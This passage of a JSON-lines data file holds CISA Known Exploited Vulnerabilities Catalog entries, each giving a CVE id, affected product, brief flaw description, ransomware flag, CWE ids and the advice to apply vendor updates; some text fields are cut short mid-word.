execute code on the system, caused by a YAML deserialization flaw.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-502\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-47986", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-41223", "text": "Mitel MiVoice Connect Code Injection Vulnerability\n\nAffected: Mitel MiVoice Connect\n\nThe Director component in Mitel MiVoice Connect allows an authenticated attacker with internal network access to execute code within the context of the application.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-94\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-41223", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-40765", "text": "Mitel MiVoice Connect Command Injection Vulnerability\n\nAffected: Mitel MiVoice Connect\n\nThe Mitel Edge Gateway component of MiVoice Connect allows an authenticated attacker with internal network access to execute commands within the context of the system.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-77\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-40765", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-46169", "text": "Cacti Command Injection Vulnerability\n\nAffected: Cacti Cacti\n\nCacti contains a command injection vulnerability that allows an unauthenticated user to execute code.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-74\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-46169", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-21715", "text": "Microsoft Office Publisher Security Feature Bypass Vulnerability\n\nAffected: Microsoft Office\n\nMicrosoft Office Publisher contains a security feature bypass vulnerability that allows for a local, authenticated attack on a targeted system.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-863\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-21715", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-23529", "text": "Apple Multiple Products WebKit Type Confusion Vulnerability\n\nAffected: Apple Multiple Products\n\nApple iOS, MacOS, Safari and iPadOS WebKit contain a type confusion vulnerability that leads to code execution when processing maliciously crafted web content. This vulnerability could impact HTML parsers that use WebKit, including but not limited to Apple Safari and non-Apple products which rely on WebKit for HTML processing.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-843\n\n", "cve_id": "CVE-2023-23529", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-21823", "text": "Microsoft Windows Graphic Component Privilege Escalation Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Graphic Component contains an unspecified vulnerability that allows for privilege escalation.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-190\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-21823", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-24990", "text": "TerraMaster OS Remote Command Execution Vulnerability\n\nAffected: TerraMaster TerraMaster OS\n\nTerraMaster OS contains a remote command execution vulnerability that allows an unauthenticated user to execute commands on the target endpoint.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-306\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-24990", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-0669", "text": "Fortra GoAnywhere MFT Remote Code Execution Vulnerability\n\nAffected: Fortra GoAnywhere MFT\n\nFortra (formerly, HelpSystems) GoAnywhere MFT contains a pre-authentication remote code execution vulnerability in the License Response Servlet due to deserializing an attacker-controlled object.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-502\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-0669", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-21587", "text": "Oracle E-Business Suite Unspecified Vulnerability\n\nAffected: Oracle E-Business Suite\n\nOracle E-Business Suite contains an unspecified vulnerability that allows an unauthenticated attacker with network access via HTTP to compromise Oracle Web Applications Desktop Integrator.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-306\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-21587", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-22952", "text": "Multiple SugarCRM Products Remote Code Execution Vulnerability\n\nAffected: SugarCRM Multiple Products\n\nMultiple SugarCRM products contain a remote code execution vulnerability in the EmailTemplates. Using a specially crafted request, custom PHP code can be injected through the EmailTemplates.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-20\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-22952", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-47966", "text": "Zoho ManageEngine Multiple Products Remote Code Execution Vulnerability\n\nAffected: Zoho ManageEngine\n\nMultiple Zoho ManageEngine products contain an unauthenticated remote code execution vulnerability due to the usage of an outdated third-party dependency, Apache Santuario.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-47966", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-44877", "text": "CWP Control Web Panel OS Command Injection Vulnerability\n\nAffected: CWP Control Web Panel\n\nCWP Control Web Panel (formerly CentOS Web Panel) contains an OS command injection vulnerability that allows remote attackers to execute commands via shell metacharacters in the login parameter.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-78\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-44877", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-41080", "text": "Microsoft Exchange Server Privilege Escalation Vulnerability\n\nAffected: Microsoft Exchange Server\n\nMicrosoft Exchange Server contains an unspecified vulnerability that allows for privilege escalation. This vulnerability is chainable with CVE-2022-41082, which allows for remote code execution.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-41080", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2023-21674", "text": "Microsoft Windows Advanced Local Procedure Call (ALPC) Privilege Escalation Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Advanced Local Procedure Call (ALPC) contains an unspecified vulnerability that allows for privilege escalation.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-416\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2023-21674", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-42856", "text": "Apple iOS Type Confusion Vulnerability\n\nAffected: Apple iOS\n\nApple iOS contains a type confusion vulnerability when processing maliciously crafted web content leading to code execution.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-843\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-42856", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-42475", "text": "Fortinet FortiOS Heap-Based Buffer Overflow Vulnerability\n\nAffected: Fortinet FortiOS\n\nMultiple versions of Fortinet FortiOS SSL-VPN contain a heap-based buffer overflow vulnerability which can allow an unauthenticated, remote attacker to execute arbitrary code or commands via specifically crafted requests.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-197\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-42475", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-44698", "text": "Microsoft Defender SmartScreen Security Feature Bypass Vulnerability\n\nAffected: Microsoft Defender\n\nMicrosoft Defender SmartScreen contains a security feature bypass vulnerability that could allow an attacker to evade Mark of the Web (MOTW) defenses via a specially crafted malicious file.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-755\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-44698", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-27518", "text": "Citrix Application Delivery Controller (ADC) and Gateway Authentication Bypass Vulnerability\n\nAffected: Citrix Application Delivery Controller (ADC) and Gateway\n\nCitrix Application Delivery Controller (ADC) and Gateway, when configured with SAML SP or IdP configuration, contain an authentication bypass vulnerability that allows an attacker to execute code as administrator.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-664\n\n[Source: CISA Known Exploited Vulnerabilities Cat", "cve_id": "CVE-2022-27518", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-26500", "text": "Veeam Backup & Replication Remote Code Execution Vulnerability\n\nAffected: Veeam Backup & Replication\n\nThe Veeam Distribution Service in the Backup & Replication application allows unauthenticated users to access internal API functions. A remote attacker can send input to the internal API which may lead to uploading and executing of malicious code.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-22\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-26500", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-26501", "text": "Veeam Backup & Replication Remote Code Execution Vulnerability\n\nAffected: Veeam Backup & Replication\n\nThe Veeam Distribution Service in the Backup & Replication application allows unauthenticated users to access internal API functions. A remote attacker can send input to the internal API which may lead to uploading and executing of malicious code.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-306\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-26501", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-4262", "text": "Google Chromium V8 Type Confusion Vulnerability\n\nAffected: Google Chromium V8\n\nGoogle Chromium V8 Engine contains a type confusion vulnerability that allows a remote attacker to potentially exploit heap corruption via a crafted HTML page. This vulnerability could affect multiple web browsers that utilize Chromium, including, but not limited to, Google Chrome, Microsoft Edge, and Opera.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-122, CWE-843\n\n[Source: CISA Known Exploit", "cve_id": "CVE-2022-4262", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-4135", "text": "Google Chromium GPU Heap Buffer Overflow Vulnerability\n\nAffected: Google Chromium GPU\n\nGoogle Chromium GPU contains a heap buffer overflow vulnerability that allows a remote attacker, who has compromised the renderer process, to potentially perform a sandbox escape via a crafted HTML page. This vulnerability could affect multiple web browsers that utilize Chromium, including, but not limited to, Google Chrome, Microsoft Edge, and Opera.\n\nRequired Action: Apply updates per vendor instructions.\n\nC", "cve_id": "CVE-2022-4135", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-41049", "text": "Microsoft Windows Mark of the Web (MOTW) Security Feature Bypass Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Mark of the Web (MOTW) contains a security feature bypass vulnerability resulting in a limited loss of integrity and availability of security features.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-274\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-41049", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-41091", "text": "Microsoft Windows Mark of the Web (MOTW) Security Feature Bypass Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Mark of the Web (MOTW) contains a security feature bypass vulnerability resulting in a limited loss of integrity and availability of security features.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-863\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-41091", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-41073", "text": "Microsoft Windows Print Spooler Privilege Escalation Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Print Spooler contains an unspecified vulnerability that allows an attacker to gain SYSTEM-level privileges.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-787\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-41073", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-41125", "text": "Microsoft Windows CNG Key Isolation Service Privilege Escalation Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Cryptographic Next Generation (CNG) Key Isolation Service contains an unspecified vulnerability that allows an attacker to gain SYSTEM-level privileges.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-787\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-41125", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-41128", "text": "Microsoft Windows Scripting Languages Remote Code Execution Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows contains an unspecified vulnerability in the JScript9 scripting language which allows for remote code execution.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-787\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-41128", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-42827", "text": "Apple iOS and iPadOS Out-of-Bounds Write Vulnerability\n\nAffected: Apple iOS and iPadOS\n\nApple iOS and iPadOS kernel contain an out-of-bounds write vulnerability which can allow an application to perform code execution with kernel privileges.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-20, CWE-787\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-42827", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-41352", "text": "Synacor Zimbra Collaboration Suite (ZCS) Arbitrary File Upload Vulnerability\n\nAffected: Synacor Zimbra Collaboration Suite (ZCS)\n\nSynacor Zimbra Collaboration Suite (ZCS) allows an attacker to upload arbitrary files using cpio package to gain incorrect access to any other user accounts.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-22\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-41352", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-40684", "text": "Fortinet Multiple Products Authentication Bypass Vulnerability\n\nAffected: Fortinet Multiple Products\n\nFortinet FortiOS, FortiProxy, and FortiSwitchManager contain an authentication bypass vulnerability that could allow an unauthenticated attacker to perform operations on the administrative interface via specially crafted HTTP or HTTPS requests.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-288\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-40684", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-41033", "text": "Microsoft Windows COM+ Event System Service Privilege Escalation Vulnerability\n\nAffected: Microsoft Windows COM+ Event System Service\n\nMicrosoft Windows COM+ Event System Service contains an unspecified vulnerability that allows for privilege escalation.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-843\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-41033", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-41082", "text": "Microsoft Exchange Server Remote Code Execution Vulnerability\n\nAffected: Microsoft Exchange Server\n\nMicrosoft Exchange Server contains an unspecified vulnerability that allows for authenticated remote code execution. Dubbed \"ProxyNotShell,\" this vulnerability is chainable with CVE-2022-41040 which allows for the remote code execution.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-502\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-41082", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-41040", "text": "Microsoft Exchange Server Server-Side Request Forgery Vulnerability\n\nAffected: Microsoft Exchange Server\n\nMicrosoft Exchange Server allows for server-side request forgery. Dubbed \"ProxyNotShell,\" this vulnerability is chainable with CVE-2022-41082 which allows for remote code execution.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-918\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-41040", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-36804", "text": "Atlassian Bitbucket Server and Data Center Command Injection Vulnerability\n\nAffected: Atlassian Bitbucket Server and Data Center\n\nMultiple API endpoints of Atlassian Bitbucket Server and Data Center contain a command injection vulnerability where an attacker with access to a public Bitbucket repository, or with read permissions to a private one, can execute code by sending a malicious HTTP request.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-78, CWE-88, CWE-158\n\n[Source", "cve_id": "CVE-2022-36804", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-3236", "text": "Sophos Firewall Code Injection Vulnerability\n\nAffected: Sophos Firewall\n\nA code injection vulnerability in the User Portal and Webadmin of Sophos Firewall allows for remote code execution.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-94\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-3236", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-35405", "text": "Zoho ManageEngine Multiple Products Remote Code Execution Vulnerability\n\nAffected: Zoho ManageEngine\n\nZoho ManageEngine PAM360, Password Manager Pro, and Access Manager Plus contain an unspecified vulnerability that allows for remote code execution.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-502\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-35405", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-40139", "text": "Trend Micro Apex One and Apex One as a Service Improper Validation Vulnerability\n\nAffected: Trend Micro Apex One and Apex One as a Service\n\nTrend Micro Apex One and Apex One as a Service contain an improper validation of rollback mechanism components that could lead to remote code execution.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-353, CWE-641\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-40139", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-37969", "text": "Microsoft Windows Common Log File System (CLFS) Driver Privilege Escalation Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Common Log File System (CLFS) driver contains an unspecified vulnerability that allows for privilege escalation.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-20, CWE-787\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-37969", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-32917", "text": "Apple iOS, iPadOS, and macOS Remote Code Execution Vulnerability\n\nAffected: Apple iOS, iPadOS, and macOS\n\nApple kernel, which is included in iOS, iPadOS, and macOS, contains an unspecified vulnerability where an application may be able to execute code with kernel privileges.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-20, CWE-787\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-32917", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-3075", "text": "Google Chromium Mojo Insufficient Data Validation Vulnerability\n\nAffected: Google Chromium Mojo\n\nGoogle Chromium Mojo contains an insufficient data validation vulnerability that allows a remote attacker, who has compromised the renderer process, to potentially perform a sandbox escape via a crafted HTML page. This vulnerability could affect multiple web browsers that utilize Chromium, including, but not limited to, Google Chrome, Microsoft Edge, and Opera.\n\nRequired Action: Apply updates per ven", "cve_id": "CVE-2022-3075", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-27593", "text": "QNAP Photo Station Externally Controlled Reference Vulnerability\n\nAffected: QNAP Photo Station\n\nCertain QNAP NAS running Photo Station with internet exposure contain an externally controlled reference to a resource vulnerability which can allow an attacker to modify system files. This vulnerability was observed being utilized in a Deadbolt ransomware campaign.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-610\n\n[Source: CISA Known Exploited Vulnerabiliti", "cve_id": "CVE-2022-27593", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-26258", "text": "D-Link DIR-820L Remote Code Execution Vulnerability\n\nAffected: D-Link DIR-820L\n\nD-Link DIR-820L contains an unspecified vulnerability in Device Name parameter in /lan.asp which allows for remote code execution.\n\nRequired Action: The impacted product is end-of-life and should be disconnected if still in use.\n\nCWE(s): CWE-78\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-26258", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-26352", "text": "dotCMS Unrestricted Upload of File Vulnerability\n\nAffected: dotCMS dotCMS\n\ndotCMS ContentResource API contains an unrestricted upload of file with a dangerous type vulnerability that allows for directory traversal, in which the file is saved outside of the intended storage location. Exploitation allows for remote code execution.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-22, CWE-138\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-26352", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-24706", "text": "Apache CouchDB Insecure Default Initialization of Resource Vulnerability\n\nAffected: Apache CouchDB\n\nApache CouchDB contains an insecure default initialization of resource vulnerability which can allow an attacker to escalate to administrative privileges.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-1188\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-24706", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-24112", "text": "Apache APISIX Authentication Bypass Vulnerability\n\nAffected: Apache APISIX\n\nApache APISIX contains an authentication bypass vulnerability that allows for remote code execution.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-290\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-24112", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-22963", "text": "VMware Tanzu Spring Cloud Function Remote Code Execution Vulnerability\n\nAffected: VMware Tanzu Spring Cloud\n\nWhen using routing functionality in VMware Tanzu's Spring Cloud Function, it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-94\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-22963", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-2294", "text": "WebRTC Heap Buffer Overflow Vulnerability\n\nAffected: WebRTC WebRTC\n\nWebRTC, an open-source project providing web browsers with real-time communication, contains a heap buffer overflow vulnerability that allows an attacker to perform shellcode execution. This vulnerability impacts web browsers using WebRTC including but not limited to Google Chrome.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-122\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-2294", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-0028", "text": "Palo Alto Networks PAN-OS Reflected Amplification Denial-of-Service Vulnerability\n\nAffected: Palo Alto Networks PAN-OS\n\nA Palo Alto Networks PAN-OS URL filtering policy misconfiguration could allow a network-based attacker to conduct reflected and amplified TCP denial-of-service (RDoS) attacks.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-940\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-0028", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-22536", "text": "SAP Multiple Products HTTP Request Smuggling Vulnerability\n\nAffected: SAP Multiple Products\n\nSAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server and SAP Web Dispatcher allow HTTP request smuggling. An unauthenticated attacker can prepend a victim's request with arbitrary data, allowing for function execution impersonating the victim or poisoning intermediary Web caches.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): C", "cve_id": "CVE-2022-22536", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-32894", "text": "Apple iOS and macOS Out-of-Bounds Write Vulnerability\n\nAffected: Apple iOS and macOS\n\nApple iOS and macOS contain an out-of-bounds write vulnerability that could allow an application to execute code with kernel privileges.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-20, CWE-787\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-32894", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-32893", "text": "Apple iOS and macOS Out-of-Bounds Write Vulnerability\n\nAffected: Apple iOS and macOS\n\nApple iOS and macOS contain an out-of-bounds write vulnerability that could allow for remote code execution when processing malicious crafted web content.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-20, CWE-787\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-32893", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-2856", "text": "Google Chromium Intents Insufficient Input Validation Vulnerability\n\nAffected: Google Chromium Intents\n\nGoogle Chromium Intents contains an insufficient validation of untrusted input vulnerability that allows a remote attacker to browse to a malicious website via a crafted HTML page. This vulnerability could affect multiple web browsers that utilize Chromium, including, but not limited to, Google Chrome, Microsoft Edge, and Opera.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s):", "cve_id": "CVE-2022-2856", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-26923", "text": "Microsoft Active Directory Domain Services Privilege Escalation Vulnerability\n\nAffected: Microsoft Active Directory\n\nAn authenticated user could manipulate attributes on computer accounts they own or manage, and acquire a certificate from Active Directory Certificate Services that would allow for privilege escalation to SYSTEM.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-295\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-26923", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-21971", "text": "Microsoft Windows Runtime Remote Code Execution Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Runtime contains an unspecified vulnerability that allows for remote code execution.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-824\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-21971", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-27925", "text": "Synacor Zimbra Collaboration Suite (ZCS) Arbitrary File Upload Vulnerability\n\nAffected: Synacor Zimbra Collaboration Suite (ZCS)\n\nSynacor Zimbra Collaboration Suite (ZCS) contains flaw in the mboximport functionality, allowing an authenticated attacker to upload arbitrary files to perform remote code execution. This vulnerability was chained with CVE-2022-37042 which allows for unauthenticated remote code execution.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE", "cve_id": "CVE-2022-27925", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-37042", "text": "Synacor Zimbra Collaboration Suite (ZCS) Authentication Bypass Vulnerability\n\nAffected: Synacor Zimbra Collaboration Suite (ZCS)\n\nSynacor Zimbra Collaboration Suite (ZCS) contains an authentication bypass vulnerability in MailboxImportServlet. This vulnerability was chained with CVE-2022-27925 which allows for unauthenticated remote code execution.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-23\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-37042", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-34713", "text": "Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability\n\nAffected: Microsoft Windows\n\nA remote code execution vulnerability exists when Microsoft Windows MSDT is called using the URL protocol from a calling application.\n\nRequired Action: Apply updates per vendor instructions.\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-34713", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-30333", "text": "RARLAB UnRAR Directory Traversal Vulnerability\n\nAffected: RARLAB UnRAR\n\nRARLAB UnRAR on Linux and UNIX contains a directory traversal vulnerability, allowing an attacker to write to files during an extract (unpack) operation.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-22, CWE-59\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-30333", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-27924", "text": "Synacor Zimbra Collaboration Suite (ZCS) Command Injection Vulnerability\n\nAffected: Synacor Zimbra Collaboration Suite (ZCS)\n\nSynacor Zimbra Collaboration Suite (ZCS) allows an attacker to inject memcache commands into a targeted instance which causes an overwrite of arbitrary cached entries.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-93\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-27924", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-26138", "text": "Atlassian Questions For Confluence App Hard-coded Credentials Vulnerability\n\nAffected: Atlassian Confluence\n\nAtlassian Questions For Confluence App has hard-coded credentials, exposing the username and password in plaintext. A remote unauthenticated attacker can use these credentials to log into Confluence and access all content accessible to users in the confluence-users group.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-798\n\n[Source: CISA Known Exploited Vulnerabiliti", "cve_id": "CVE-2022-26138", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-22047", "text": "Microsoft Windows Client Server Runtime Subsystem (CSRSS) Privilege Escalation Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows CSRSS contains an unspecified vulnerability that allows for privilege escalation to SYSTEM privileges.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-426\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-22047", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-26925", "text": "Microsoft Windows LSA Spoofing Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Local Security Authority (LSA) contains a spoofing vulnerability where an attacker can coerce 